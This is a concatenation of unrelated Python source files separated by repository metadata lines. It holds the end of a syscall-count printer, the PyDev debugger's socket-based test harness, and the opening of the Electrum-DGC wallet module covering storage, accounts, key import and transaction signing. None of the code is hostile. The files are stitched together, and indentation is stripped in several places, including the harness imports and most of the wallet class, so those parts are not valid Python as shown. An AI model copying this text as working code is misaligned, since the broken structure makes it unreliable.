def print_syscall_totals():
    # Print per-syscall counts as a table, most frequent first.
    if for_comm is not None:
        print "\nsyscall events for %s:\n\n" % (for_comm),
    else:
        print "\nsyscall events:\n\n",
    print "%-40s %10s\n" % ("event", "count"),
    print "%-40s %10s\n" % ("----------------------------------------", \
        "-----------"),
    for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
        reverse = True):
        print "%-40d %10d\n" % (id, val),
| gpl-2.0 |
akurtakov/Pydev | plugins/org.python.pydev.core/pysrc/tests_python/debugger_unittest.py | 1 | 21638 | try:
from urllib import quote, quote_plus, unquote_plus
except ImportError:
from urllib.parse import quote, quote_plus, unquote_plus #@UnresolvedImport
import os
import socket
import subprocess
import sys
import threading
import time
from _pydev_bundle import pydev_localhost
IS_PY3K = sys.version_info[0] >= 3
# Note: copied (don't import because we want it to be independent on the actual code because of backward compatibility).
CMD_RUN = 101
CMD_LIST_THREADS = 102
CMD_THREAD_CREATE = 103
CMD_THREAD_KILL = 104
CMD_THREAD_SUSPEND = 105
CMD_THREAD_RUN = 106
CMD_STEP_INTO = 107
CMD_STEP_OVER = 108
CMD_STEP_RETURN = 109
CMD_GET_VARIABLE = 110
CMD_SET_BREAK = 111
CMD_REMOVE_BREAK = 112
CMD_EVALUATE_EXPRESSION = 113
CMD_GET_FRAME = 114
CMD_EXEC_EXPRESSION = 115
CMD_WRITE_TO_CONSOLE = 116
CMD_CHANGE_VARIABLE = 117
CMD_RUN_TO_LINE = 118
CMD_RELOAD_CODE = 119
CMD_GET_COMPLETIONS = 120
# Note: renumbered (conflicted on merge)
CMD_CONSOLE_EXEC = 121
CMD_ADD_EXCEPTION_BREAK = 122
CMD_REMOVE_EXCEPTION_BREAK = 123
CMD_LOAD_SOURCE = 124
CMD_ADD_DJANGO_EXCEPTION_BREAK = 125
CMD_REMOVE_DJANGO_EXCEPTION_BREAK = 126
CMD_SET_NEXT_STATEMENT = 127
CMD_SMART_STEP_INTO = 128
CMD_EXIT = 129
CMD_SIGNATURE_CALL_TRACE = 130
CMD_SET_PY_EXCEPTION = 131
CMD_GET_FILE_CONTENTS = 132
CMD_SET_PROPERTY_TRACE = 133
# Pydev debug console commands
CMD_EVALUATE_CONSOLE_EXPRESSION = 134
CMD_RUN_CUSTOM_OPERATION = 135
CMD_GET_BREAKPOINT_EXCEPTION = 136
CMD_STEP_CAUGHT_EXCEPTION = 137
CMD_SEND_CURR_EXCEPTION_TRACE = 138
CMD_SEND_CURR_EXCEPTION_TRACE_PROCEEDED = 139
CMD_IGNORE_THROWN_EXCEPTION_AT = 140
CMD_ENABLE_DONT_TRACE = 141
CMD_SHOW_CONSOLE = 142
CMD_GET_ARRAY = 143
CMD_STEP_INTO_MY_CODE = 144
CMD_GET_CONCURRENCY_EVENT = 145
CMD_VERSION = 501
CMD_RETURN = 502
CMD_ERROR = 901
# Always True (because otherwise when we do have an error, it's hard to diagnose).
SHOW_WRITES_AND_READS = True
SHOW_OTHER_DEBUG_INFO = True
SHOW_STDOUT = True
try:
from thread import start_new_thread
except ImportError:
from _thread import start_new_thread # @UnresolvedImport
try:
xrange
except:
xrange = range
#=======================================================================================================================
# ReaderThread
#=======================================================================================================================
class ReaderThread(threading.Thread):
    # Daemon thread that reads newline-terminated debugger messages from a
    # socket and queues them for the test code to consume.

    def __init__(self, sock):
        threading.Thread.__init__(self)
        try:
            from queue import Queue
        except ImportError:
            from Queue import Queue
        self.setDaemon(True)
        self.sock = sock
        self._queue = Queue()
        self.all_received = []
        self._kill = False

    def get_next_message(self, context_messag):
        # Block up to 15s for the next full message; on timeout raise an
        # AssertionError carrying the caller-supplied context for diagnosis.
        try:
            msg = self._queue.get(block=True, timeout=15)
        except:
            raise AssertionError('No message was written in 15 seconds. Error message:\n%s' % (context_messag,))
        else:
            # Log who asked for the message (two caller frames) to stdout.
            frame = sys._getframe().f_back
            frame_info = ' -- File "%s", line %s, in %s\n' % (frame.f_code.co_filename, frame.f_lineno, frame.f_code.co_name)
            frame_info += ' -- File "%s", line %s, in %s\n' % (frame.f_back.f_code.co_filename, frame.f_back.f_lineno, frame.f_back.f_code.co_name)
            frame = None
            sys.stdout.write('Message returned in get_next_message(): %s -- ctx: %s, returned to:\n%s\n' % (msg, context_messag, frame_info))
        return msg

    def run(self):
        # Accumulate socket data and split it into '\n'-terminated messages.
        try:
            buf = ''
            while not self._kill:
                l = self.sock.recv(1024)
                if IS_PY3K:
                    l = l.decode('utf-8')
                self.all_received.append(l)
                buf += l
                while '\n' in buf:
                    # Print each part...
                    i = buf.index('\n')+1
                    last_received = buf[:i]
                    buf = buf[i:]
                    if SHOW_WRITES_AND_READS:
                        print('Test Reader Thread Received %s' % (last_received, ))
                    self._queue.put(last_received)
        except:
            pass # ok, finished it
        finally:
            del self.all_received[:]

    def do_kill(self):
        self._kill = True
        if hasattr(self, 'sock'):
            self.sock.close()
class DebuggerRunner(object):
    # Launches the debugged process with pydevd attached and validates the
    # run: output contents, exit code, and writer-thread success.

    def get_command_line(self):
        '''
        Returns the base command line (i.e.: ['python.exe', '-u'])
        '''
        raise NotImplementedError

    def add_command_line_args(self, args):
        # Append the pydevd invocation (client host/port from the writer
        # thread) and the target file/module arguments.
        writer_thread = self.writer_thread
        port = int(writer_thread.port)
        localhost = pydev_localhost.get_localhost()
        ret = args + [
            writer_thread.get_pydevd_file(),
            '--DEBUG_RECORD_SOCKET_READS',
            '--qt-support',
            '--client',
            localhost,
            '--port',
            str(port),
        ]
        if writer_thread.IS_MODULE:
            ret += ['--module']
        ret = ret + ['--file'] + writer_thread.get_command_line_args()
        return ret

    def check_case(self, writer_thread_class):
        # Run one test case: start the writer thread, wait for it to bind
        # its port, launch the debugged process, and verify the output.
        writer_thread = writer_thread_class()
        try:
            writer_thread.start()
            for _i in xrange(40000):
                if hasattr(writer_thread, 'port'):
                    break
                time.sleep(.01)
            self.writer_thread = writer_thread
            args = self.get_command_line()
            args = self.add_command_line_args(args)
            if SHOW_OTHER_DEBUG_INFO:
                print('executing', ' '.join(args))
            ret = self.run_process(args, writer_thread)
        finally:
            writer_thread.do_kill()
            writer_thread.log = []
        stdout = ret['stdout']
        stderr = ret['stderr']
        writer_thread.additional_output_checks(''.join(stdout), ''.join(stderr))
        return ret

    def create_process(self, args, writer_thread):
        # stderr is merged into stdout so a single reader sees everything.
        process = subprocess.Popen(
            args,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            cwd=writer_thread.get_cwd() if writer_thread is not None else '.',
            env=writer_thread.get_environ() if writer_thread is not None else None,
        )
        return process

    def run_process(self, args, writer_thread):
        # Start the process, capture its output on a helper thread, and
        # poll until it exits (killing it after a timeout if needed).
        process = self.create_process(args, writer_thread)
        stdout = []
        stderr = []
        finish = [False]
        try:
            def read(stream, buffer):
                for line in stream.readlines():
                    if finish[0]:
                        return
                    if IS_PY3K:
                        line = line.decode('utf-8')
                    if SHOW_STDOUT:
                        sys.stdout.write('stdout: %s' % (line,))
                    buffer.append(line)
            start_new_thread(read, (process.stdout, stdout))
            if SHOW_OTHER_DEBUG_INFO:
                print('Both processes started')
            # polls can fail (because the process may finish and the thread still not -- so, we give it some more chances to
            # finish successfully).
            initial_time = time.time()
            shown_intermediate = False
            while True:
                if process.poll() is not None:
                    break
                else:
                    if writer_thread is not None:
                        if not writer_thread.isAlive():
                            if writer_thread.FORCE_KILL_PROCESS_WHEN_FINISHED_OK:
                                process.kill()
                                continue
                            if not shown_intermediate and (time.time() - initial_time > 10):
                                print('Warning: writer thread exited and process still did not (%.2fs seconds elapsed).' % (time.time() - initial_time,))
                                shown_intermediate = True
                            if time.time() - initial_time > 20:
                                process.kill()
                                time.sleep(.2)
                                self.fail_with_message(
                                    "The other process should've exited but still didn't (%.2fs seconds timeout for process to exit)." % (time.time() - initial_time,),
                                    stdout, stderr, writer_thread
                                )
                time.sleep(.2)
            if writer_thread is not None:
                if not writer_thread.FORCE_KILL_PROCESS_WHEN_FINISHED_OK:
                    poll = process.poll()
                    if poll < 0:
                        self.fail_with_message(
                            "The other process exited with error code: " + str(poll), stdout, stderr, writer_thread)
                    if stdout is None:
                        self.fail_with_message(
                            "The other process may still be running -- and didn't give any output.", stdout, stderr, writer_thread)
                    # The debugged script is expected to print this marker.
                    check = 0
                    while 'TEST SUCEEDED' not in ''.join(stdout):
                        check += 1
                        if check == 50:
                            self.fail_with_message("TEST SUCEEDED not found in stdout.", stdout, stderr, writer_thread)
                        time.sleep(.1)
                for _i in xrange(100):
                    if not writer_thread.finished_ok:
                        time.sleep(.1)
                if not writer_thread.finished_ok:
                    self.fail_with_message(
                        "The thread that was doing the tests didn't finish successfully.", stdout, stderr, writer_thread)
        finally:
            finish[0] = True
        return {'stdout':stdout, 'stderr':stderr}

    def fail_with_message(self, msg, stdout, stderr, writerThread):
        # Raise with the full captured output and writer-thread log attached.
        raise AssertionError(msg+
            "\n\n===========================\nStdout: \n"+''.join(stdout)+
            "\n\n===========================\nStderr:"+''.join(stderr)+
            "\n\n===========================\nLog:\n"+'\n'.join(getattr(writerThread, 'log', [])))
#=======================================================================================================================
# AbstractWriterThread
#=======================================================================================================================
class AbstractWriterThread(threading.Thread):
    # Base class for per-test writer threads: owns the server socket the
    # debugged process connects back to, and provides helpers to send
    # debugger protocol commands and wait for the expected responses.

    FORCE_KILL_PROCESS_WHEN_FINISHED_OK = False
    IS_MODULE = False

    def __init__(self):
        threading.Thread.__init__(self)
        self.setDaemon(True)
        self.finished_ok = False
        self._next_breakpoint_id = 0
        self.log = []

    def additional_output_checks(self, stdout, stderr):
        # Hook for subclasses to validate the debugged process output.
        pass

    def get_environ(self):
        return None

    def get_pydevd_file(self):
        # pydevd.py lives two directories above this test module.
        dirname = os.path.dirname(__file__)
        dirname = os.path.dirname(dirname)
        return os.path.abspath(os.path.join(dirname, 'pydevd.py'))

    def get_cwd(self):
        return os.path.dirname(self.get_pydevd_file())

    def get_command_line_args(self):
        return [self.TEST_FILE]

    def do_kill(self):
        if hasattr(self, 'server_socket'):
            self.server_socket.close()
        if hasattr(self, 'reader_thread'):
            # if it's not created, it's not there...
            self.reader_thread.do_kill()
        if hasattr(self, 'sock'):
            self.sock.close()

    def write(self, s):
        # Send one protocol command (newline-terminated) to the debugger.
        self.log.append('write: %s' % (s,))
        if SHOW_WRITES_AND_READS:
            print('Test Writer Thread Written %s' % (s,))
        msg = s + '\n'
        if IS_PY3K:
            msg = msg.encode('utf-8')
        self.sock.send(msg)

    def start_socket(self, port=None):
        # Bind, accept the debugger connection, start the reader thread and
        # send the initial version handshake.
        from _pydev_bundle.pydev_localhost import get_socket_name
        if SHOW_WRITES_AND_READS:
            print('start_socket')
        if port is None:
            socket_name = get_socket_name(close=True)
        else:
            socket_name = (pydev_localhost.get_localhost(), port)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(socket_name)
        self.port = socket_name[1]
        s.listen(1)
        if SHOW_WRITES_AND_READS:
            print('Waiting in socket.accept()')
        self.server_socket = s
        newSock, addr = s.accept()
        if SHOW_WRITES_AND_READS:
            print('Test Writer Thread Socket:', newSock, addr)
        reader_thread = self.reader_thread = ReaderThread(newSock)
        reader_thread.start()
        self.sock = newSock
        self._sequence = -1
        # initial command is always the version
        self.write_version()
        self.log.append('start_socket')

    def next_breakpoint_id(self):
        self._next_breakpoint_id += 1
        return self._next_breakpoint_id

    def next_seq(self):
        # Client-originated sequence numbers are odd: -1, 1, 3, ...
        self._sequence += 2
        return self._sequence

    def wait_for_new_thread(self):
        # wait for hit breakpoint
        last = ''
        while not '<xml><thread name="' in last or '<xml><thread name="pydevd.' in last:
            last = self.reader_thread.get_next_message('wait_for_new_thread')
        # we have something like <xml><thread name="MainThread" id="12103472" /></xml>
        splitted = last.split('"')
        thread_id = splitted[3]
        return thread_id

    def wait_for_breakpoint_hit(self, *args, **kwargs):
        # Same as the full variant, minus the trailing suspend_type element.
        return self.wait_for_breakpoint_hit_with_suspend_type(*args, **kwargs)[:-1]

    def wait_for_breakpoint_hit_with_suspend_type(self, reason='111', get_line=False, get_name=False):
        '''
        108 is over
        109 is return
        111 is breakpoint
        '''
        self.log.append('Start: wait_for_breakpoint_hit')
        # wait for hit breakpoint
        last = ''
        while not ('stop_reason="%s"' % reason) in last:
            last = self.reader_thread.get_next_message('wait_for_breakpoint_hit. reason=%s' % (reason,))
        # we have something like <xml><thread id="12152656" stop_reason="111"><frame id="12453120" name="encode" ...
        splitted = last.split('"')
        suspend_type = splitted[7]
        thread_id = splitted[1]
        frameId = splitted[9]
        name = splitted[11]
        if get_line:
            self.log.append('End(0): wait_for_breakpoint_hit: %s' % (last,))
            try:
                if not get_name:
                    return thread_id, frameId, int(splitted[15]), suspend_type
                else:
                    return thread_id, frameId, int(splitted[15]), name, suspend_type
            except:
                raise AssertionError('Error with: %s, %s, %s.\nLast: %s.\n\nAll: %s\n\nSplitted: %s' % (
                    thread_id, frameId, splitted[13], last, '\n'.join(self.reader_thread.all_received), splitted))
        self.log.append('End(1): wait_for_breakpoint_hit: %s' % (last,))
        if not get_name:
            return thread_id, frameId, suspend_type
        else:
            return thread_id, frameId, name, suspend_type

    def wait_for_custom_operation(self, expected):
        # wait for custom operation response, the response is double encoded
        expected_encoded = quote(quote_plus(expected))
        last = ''
        while not expected_encoded in last:
            last = self.reader_thread.get_next_message('wait_for_custom_operation. Expected (encoded): %s' % (expected_encoded,))
        return True

    def _is_var_in_last(self, expected, last):
        # Check for the expected text raw and after one or two unquotes.
        if expected in last:
            return True
        last = unquote_plus(last)
        if expected in last:
            return True
        # We actually quote 2 times on the backend...
        last = unquote_plus(last)
        if expected in last:
            return True
        return False

    def wait_for_multiple_vars(self, expected_vars):
        # Keep reading messages until every expected var (or one alternative
        # from each tuple/list of alternatives) has been seen.
        if not isinstance(expected_vars, (list, tuple)):
            expected_vars = [expected_vars]
        all_found = []
        while True:
            try:
                last = self.reader_thread.get_next_message('wait_for_multiple_vars: %s' % (expected_vars,))
            except:
                missing = []
                for v in expected_vars:
                    if v not in all_found:
                        missing.append(v)
                raise ValueError('Not Found:\n%s\nNot found messages: %s\nFound messages: %s\nExpected messages: %s' % (
                    '\n'.join(missing), len(missing), len(all_found), len(expected_vars)))
            found = 0
            for expected in expected_vars:
                if isinstance(expected, (tuple, list)):
                    for e in expected:
                        if self._is_var_in_last(e, last):
                            all_found.append(expected)
                            found += 1
                            break
                else:
                    if self._is_var_in_last(expected, last):
                        all_found.append(expected)
                        found += 1
            if found == len(expected_vars):
                return True

    # Aliases kept for readability at call sites.
    wait_for_var = wait_for_multiple_vars
    wait_for_vars = wait_for_multiple_vars
    wait_for_evaluation = wait_for_multiple_vars

    def write_make_initial_run(self):
        self.write("101\t%s\t" % self.next_seq())
        self.log.append('write_make_initial_run')

    def write_version(self):
        self.write("501\t%s\t1.0\tWINDOWS\tID" % self.next_seq())

    def get_main_filename(self):
        return self.TEST_FILE

    def write_add_breakpoint(self, line, func):
        '''
        @param line: starts at 1
        '''
        breakpoint_id = self.next_breakpoint_id()
        self.write("111\t%s\t%s\t%s\t%s\t%s\t%s\tNone\tNone" % (self.next_seq(), breakpoint_id, 'python-line', self.get_main_filename(), line, func))
        self.log.append('write_add_breakpoint: %s line: %s func: %s' % (breakpoint_id, line, func))
        return breakpoint_id

    def write_add_exception_breakpoint(self, exception):
        self.write("122\t%s\t%s" % (self.next_seq(), exception))
        self.log.append('write_add_exception_breakpoint: %s' % (exception,))

    def write_add_exception_breakpoint_with_policy(self, exception, notify_always, notify_on_terminate, ignore_libraries):
        self.write("122\t%s\t%s" % (self.next_seq(), '\t'.join([exception, notify_always, notify_on_terminate, ignore_libraries])))
        self.log.append('write_add_exception_breakpoint: %s' % (exception,))

    def write_remove_breakpoint(self, breakpoint_id):
        self.write("112\t%s\t%s\t%s\t%s" % (self.next_seq(), 'python-line', self.get_main_filename(), breakpoint_id))

    def write_change_variable(self, thread_id, frame_id, varname, value):
        self.write("117\t%s\t%s\t%s\t%s\t%s\t%s" % (self.next_seq(), thread_id, frame_id, 'FRAME', varname, value))

    def write_get_frame(self, thread_id, frameId):
        self.write("114\t%s\t%s\t%s\tFRAME" % (self.next_seq(), thread_id, frameId))
        self.log.append('write_get_frame')

    def write_get_variable(self, thread_id, frameId, var_attrs):
        self.write("110\t%s\t%s\t%s\tFRAME\t%s" % (self.next_seq(), thread_id, frameId, var_attrs))

    def write_step_over(self, thread_id):
        self.write("108\t%s\t%s" % (self.next_seq(), thread_id,))

    def write_step_in(self, thread_id):
        self.write("107\t%s\t%s" % (self.next_seq(), thread_id,))

    def write_step_return(self, thread_id):
        self.write("109\t%s\t%s" % (self.next_seq(), thread_id,))

    def write_suspend_thread(self, thread_id):
        self.write("105\t%s\t%s" % (self.next_seq(), thread_id,))

    def write_run_thread(self, thread_id):
        self.log.append('write_run_thread')
        self.write("106\t%s\t%s" % (self.next_seq(), thread_id,))

    def write_kill_thread(self, thread_id):
        self.write("104\t%s\t%s" % (self.next_seq(), thread_id,))

    def write_set_next_statement(self, thread_id, line, func_name):
        self.write("%s\t%s\t%s\t%s\t%s" % (CMD_SET_NEXT_STATEMENT, self.next_seq(), thread_id, line, func_name,))

    def write_debug_console_expression(self, locator):
        self.write("%s\t%s\t%s" % (CMD_EVALUATE_CONSOLE_EXPRESSION, self.next_seq(), locator))

    def write_custom_operation(self, locator, style, codeOrFile, operation_fn_name):
        self.write("%s\t%s\t%s||%s\t%s\t%s" % (CMD_RUN_CUSTOM_OPERATION, self.next_seq(), locator, style, codeOrFile, operation_fn_name))

    def write_evaluate_expression(self, locator, expression):
        self.write("113\t%s\t%s\t%s\t1" % (self.next_seq(), locator, expression))

    def write_enable_dont_trace(self, enable):
        if enable:
            enable = 'true'
        else:
            enable = 'false'
        self.write("%s\t%s\t%s" % (CMD_ENABLE_DONT_TRACE, self.next_seq(), enable))
def _get_debugger_test_file(filename):
try:
rPath = os.path.realpath # @UndefinedVariable
except:
# jython does not support os.path.realpath
# realpath is a no-op on systems without islink support
rPath = os.path.abspath
return os.path.normcase(rPath(os.path.join(os.path.dirname(__file__), filename)))
def get_free_port():
    # Ask the OS for an ephemeral port (bind-and-close) and return its number.
    from _pydev_bundle.pydev_localhost import get_socket_name
    return get_socket_name(close=True)[1]
| epl-1.0 |
testalt/electrum-dgc | lib/wallet.py | 1 | 59368 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import hashlib
import ast
import threading
import random
import time
import math
import json
import copy
from util import print_msg, print_error
from bitcoin import *
from account import *
from version import *
from transaction import Transaction
from plugins import run_hook
import bitcoin
from synchronizer import WalletSynchronizer
from mnemonic import Mnemonic
# internal ID for imported account
IMPORTED_ACCOUNT = '/x'
class WalletStorage(object):
    # JSON-backed key/value store for wallet data, guarded by an RLock.

    def __init__(self, config):
        self.lock = threading.RLock()
        self.config = config
        self.data = {}
        self.file_exists = False
        self.path = self.init_path(config)
        print_error( "wallet path", self.path )
        if self.path:
            self.read(self.path)

    def init_path(self, config):
        """Set the path of the wallet."""

        # command line -w option
        path = config.get('wallet_path')
        if path:
            return path

        # path in config file
        path = config.get('default_wallet_path')
        if path:
            return path

        # default path
        dirpath = os.path.join(config.path, "wallets")
        if not os.path.exists(dirpath):
            os.mkdir(dirpath)

        new_path = os.path.join(config.path, "wallets", "default_wallet")

        # default path in pre 1.9 versions
        old_path = os.path.join(config.path, "electrum-dgc.dat")
        if os.path.exists(old_path) and not os.path.exists(new_path):
            os.rename(old_path, new_path)

        return new_path

    def read(self, path):
        """Read the contents of the wallet file."""
        # NOTE(review): the `path` argument is ignored; self.path is opened
        # instead.  The only caller passes self.path, so behaviour matches.
        try:
            with open(self.path, "r") as f:
                data = f.read()
        except IOError:
            return
        try:
            self.data = json.loads(data)
        except:
            # Older wallets stored a Python-literal dict; fall back to
            # ast.literal_eval and keep only JSON-serializable entries.
            try:
                d = ast.literal_eval(data)  #parse raw data from reading wallet file
            except Exception:
                raise IOError("Cannot read wallet file.")
            self.data = {}
            for key, value in d.items():
                try:
                    json.dumps(key)
                    json.dumps(value)
                except:
                    continue
                self.data[key] = value
        self.file_exists = True

    def get(self, key, default=None):
        # Deep-copy stored values so callers cannot mutate internal state.
        with self.lock:
            v = self.data.get(key)
            if v is None:
                v = default
            else:
                v = copy.deepcopy(v)
        return v

    def put(self, key, value, save = True):
        # Refuse non-JSON-serializable entries; None deletes the key.
        try:
            json.dumps(key)
            json.dumps(value)
        except:
            print_error("json error: cannot save", key)
            return
        with self.lock:
            if value is not None:
                self.data[key] = copy.deepcopy(value)
            elif key in self.data:
                self.data.pop(key)
            if save:
                self.write()

    def write(self):
        s = json.dumps(self.data, indent=4, sort_keys=True)
        f = open(self.path,"w")
        f.write(s)
        f.close()
        if 'ANDROID_DATA' not in os.environ:
            import stat
            # Restrict the wallet file to owner read/write.
            os.chmod(self.path,stat.S_IREAD | stat.S_IWRITE)
class Abstract_Wallet(object):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
def __init__(self, storage):
self.storage = storage
self.electrum_version = ELECTRUM_VERSION
self.gap_limit_for_change = 3 # constant
# saved fields
self.seed_version = storage.get('seed_version', NEW_SEED_VERSION)
self.use_change = storage.get('use_change',True)
self.use_encryption = storage.get('use_encryption', False)
self.seed = storage.get('seed', '') # encrypted
self.labels = storage.get('labels', {})
self.frozen_addresses = storage.get('frozen_addresses',[])
self.addressbook = storage.get('contacts', [])
self.history = storage.get('addr_history',{}) # address -> list(txid, height)
self.fee_per_kb = int(storage.get('fee_per_kb', RECOMMENDED_FEE))
# This attribute is set when wallet.start_threads is called.
self.synchronizer = None
# imported_keys is deprecated. The GUI should call convert_imported_keys
self.imported_keys = self.storage.get('imported_keys',{})
self.load_accounts()
self.load_transactions()
# not saved
self.prevout_values = {} # my own transaction outputs
self.spent_outputs = []
# spv
self.verifier = None
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
self.lock = threading.Lock()
self.transaction_lock = threading.Lock()
self.tx_event = threading.Event()
for tx_hash, tx in self.transactions.items():
self.update_tx_outputs(tx_hash)
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type, True)
def load_transactions(self):
self.transactions = {}
tx_list = self.storage.get('transactions',{})
for k, raw in tx_list.items():
try:
tx = Transaction.deserialize(raw)
except Exception:
print_msg("Warning: Cannot deserialize transactions. skipping")
continue
self.add_pubkey_addresses(tx)
self.transactions[k] = tx
for h,tx in self.transactions.items():
if not self.check_new_tx(h, tx):
print_error("removing unreferenced tx", h)
self.transactions.pop(h)
def add_pubkey_addresses(self, tx):
# find the address corresponding to pay-to-pubkey inputs
h = tx.hash()
# inputs
tx.add_pubkey_addresses(self.transactions)
# outputs of tx: inputs of tx2
for type, x, v in tx.outputs:
if type == 'pubkey':
for tx2 in self.transactions.values():
tx2.add_pubkey_addresses({h:tx})
    def get_action(self):
        """Next setup action required for this wallet; base class needs none."""
        pass
    def convert_imported_keys(self, password):
        """Migrate the deprecated 'imported_keys' storage into an ImportedAccount."""
        # Python 2 items() returns a list, so popping while iterating is safe.
        for k, v in self.imported_keys.items():
            sec = pw_decode(v, password)
            pubkey = public_key_from_private_key(sec)
            address = public_key_to_bc_address(pubkey.decode('hex'))
            # sanity: stored key must still decode to its recorded address
            assert address == k
            self.import_key(sec, password)
            self.imported_keys.pop(k)
        self.storage.put('imported_keys', self.imported_keys)
    def load_accounts(self):
        """Instantiate account objects from their stored dicts, keyed by account id.

        The account class is inferred from which keys the stored dict carries
        (imported / xpub3 / xpub2 / xpub / pending), checked most-specific first.
        """
        self.accounts = {}
        d = self.storage.get('accounts', {})
        for k, v in d.items():
            if self.wallet_type == 'old' and k in [0, '0']:
                # legacy wallets store the master public key separately
                v['mpk'] = self.storage.get('master_public_key')
                self.accounts[k] = OldAccount(v)
            elif v.get('imported'):
                self.accounts[k] = ImportedAccount(v)
            elif v.get('xpub3'):
                self.accounts[k] = BIP32_Account_2of3(v)
            elif v.get('xpub2'):
                self.accounts[k] = BIP32_Account_2of2(v)
            elif v.get('xpub'):
                self.accounts[k] = BIP32_Account(v)
            elif v.get('pending'):
                self.accounts[k] = PendingAccount(v)
            else:
                print_error("cannot load account", v)
    def synchronize(self):
        """Generate addresses up to the gap limit; no-op for non-deterministic wallets."""
        pass
    def can_create_accounts(self):
        """Whether this wallet type can create new accounts (overridden by HD wallets)."""
        return False
def set_up_to_date(self,b):
with self.lock: self.up_to_date = b
def is_up_to_date(self):
with self.lock: return self.up_to_date
    def update(self):
        """Block (busy-wait) until the synchronizer marks the wallet up to date."""
        self.up_to_date = False
        # polled flag is set by the synchronizer thread via set_up_to_date()
        while not self.is_up_to_date():
            time.sleep(0.1)
def is_imported(self, addr):
account = self.accounts.get(IMPORTED_ACCOUNT)
if account:
return addr in account.get_addresses(0)
else:
return False
def has_imported_keys(self):
account = self.accounts.get(IMPORTED_ACCOUNT)
return account is not None
    def import_key(self, sec, password):
        """Import private key *sec* into the imported-keys account; returns its address.

        Raises Exception on an undecodable key or if the address is already
        in the wallet.  The address is registered with the synchronizer so its
        history starts updating immediately.
        """
        try:
            pubkey = public_key_from_private_key(sec)
            address = public_key_to_bc_address(pubkey.decode('hex'))
        except Exception:
            raise Exception('Invalid private key')
        if self.is_mine(address):
            raise Exception('Address already in wallet')
        if self.accounts.get(IMPORTED_ACCOUNT) is None:
            # lazily create the pseudo account on first import
            self.accounts[IMPORTED_ACCOUNT] = ImportedAccount({'imported':{}})
        self.accounts[IMPORTED_ACCOUNT].add(address, pubkey, sec, password)
        self.save_accounts()
        if self.synchronizer:
            self.synchronizer.add(address)
        return address
    def delete_imported_key(self, addr):
        """Remove *addr* from the imported account; drop the account when it empties."""
        account = self.accounts[IMPORTED_ACCOUNT]
        account.remove(addr)
        if not account.get_addresses(0):
            self.accounts.pop(IMPORTED_ACCOUNT)
        self.save_accounts()
def set_label(self, name, text = None):
changed = False
old_text = self.labels.get(name)
if text:
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
self.storage.put('labels', self.labels, True)
run_hook('set_label', name, text, changed)
return changed
def addresses(self, include_change = True):
o = []
for a in self.accounts.keys():
o += self.get_account_addresses(a, include_change)
return o
    def is_mine(self, address):
        """True if *address* belongs to any account of this wallet (incl. change)."""
        return address in self.addresses(True)
def is_change(self, address):
if not self.is_mine(address): return False
acct, s = self.get_address_index(address)
if s is None: return False
return s[0] == 1
def get_address_index(self, address):
for account in self.accounts.keys():
for for_change in [0,1]:
addresses = self.accounts[account].get_addresses(for_change)
for addr in addresses:
if address == addr:
return account, (for_change, addresses.index(addr))
raise Exception("Address not found", address)
    def get_private_key(self, address, password):
        """Return the list of private keys for *address* ([] if watching-only)."""
        if self.is_watching_only():
            return []
        account_id, sequence = self.get_address_index(address)
        return self.accounts[account_id].get_private_key(sequence, self, password)
    def get_public_keys(self, address):
        """Return the public keys controlling *address* (several for multisig)."""
        account_id, sequence = self.get_address_index(address)
        return self.accounts[account_id].get_pubkeys(*sequence)
    def add_keypairs(self, tx, keypairs, password):
        """Populate *keypairs* (pubkey -> secret) for every input of *tx* we can sign.

        Covers both concrete addresses we own and extended-pubkey derivations
        (multisig cosigner paths).  No-op for watching-only wallets.
        """
        if self.is_watching_only():
            return
        self.check_password(password)
        addr_list, xpub_list = tx.inputs_to_sign()
        for addr in addr_list:
            if self.is_mine(addr):
                private_keys = self.get_private_key(addr, password)
                for sec in private_keys:
                    pubkey = public_key_from_private_key(sec)
                    keypairs[ pubkey ] = sec
        for xpub, sequence in xpub_list:
            # look for account that can sign
            # for/else: skip this xpub if no account holds the master pubkey
            for k, account in self.accounts.items():
                if xpub in account.get_master_pubkeys():
                    break
            else:
                continue
            pk = account.get_private_key(sequence, self, password)
            for sec in pk:
                pubkey = public_key_from_private_key(sec)
                keypairs[pubkey] = sec
    def signrawtransaction(self, tx, private_keys, password):
        """Sign *tx* in place using wallet keys plus the extra *private_keys* given."""
        # check that the password is correct. This will raise if it's not.
        self.check_password(password)
        # build a list of public/private keys
        keypairs = {}
        # add private keys from parameter
        for sec in private_keys:
            pubkey = public_key_from_private_key(sec)
            keypairs[ pubkey ] = sec
        # add private_keys
        self.add_keypairs(tx, keypairs, password)
        # sign the transaction
        self.sign_transaction(tx, keypairs, password)
    def sign_message(self, address, message, password):
        """Sign *message* with the (single) private key of *address*."""
        keys = self.get_private_key(address, password)
        # message signing only makes sense for single-key addresses
        assert len(keys) == 1
        sec = keys[0]
        key = regenerate_key(sec)
        compressed = is_compressed(sec)
        return key.sign_message(message, compressed, address)
    def decrypt_message(self, pubkey, message, password):
        """Decrypt *message* with the private key matching hex-encoded *pubkey*."""
        address = public_key_to_bc_address(pubkey.decode('hex'))
        keys = self.get_private_key(address, password)
        secret = keys[0]
        ec = regenerate_key(secret)
        decrypted = ec.decrypt_message(message)
        return decrypted
def is_found(self):
return self.history.values() != [[]] * len(self.history)
    def add_contact(self, address, label=None):
        """Append *address* to the contact list, persist it, and optionally label it."""
        self.addressbook.append(address)
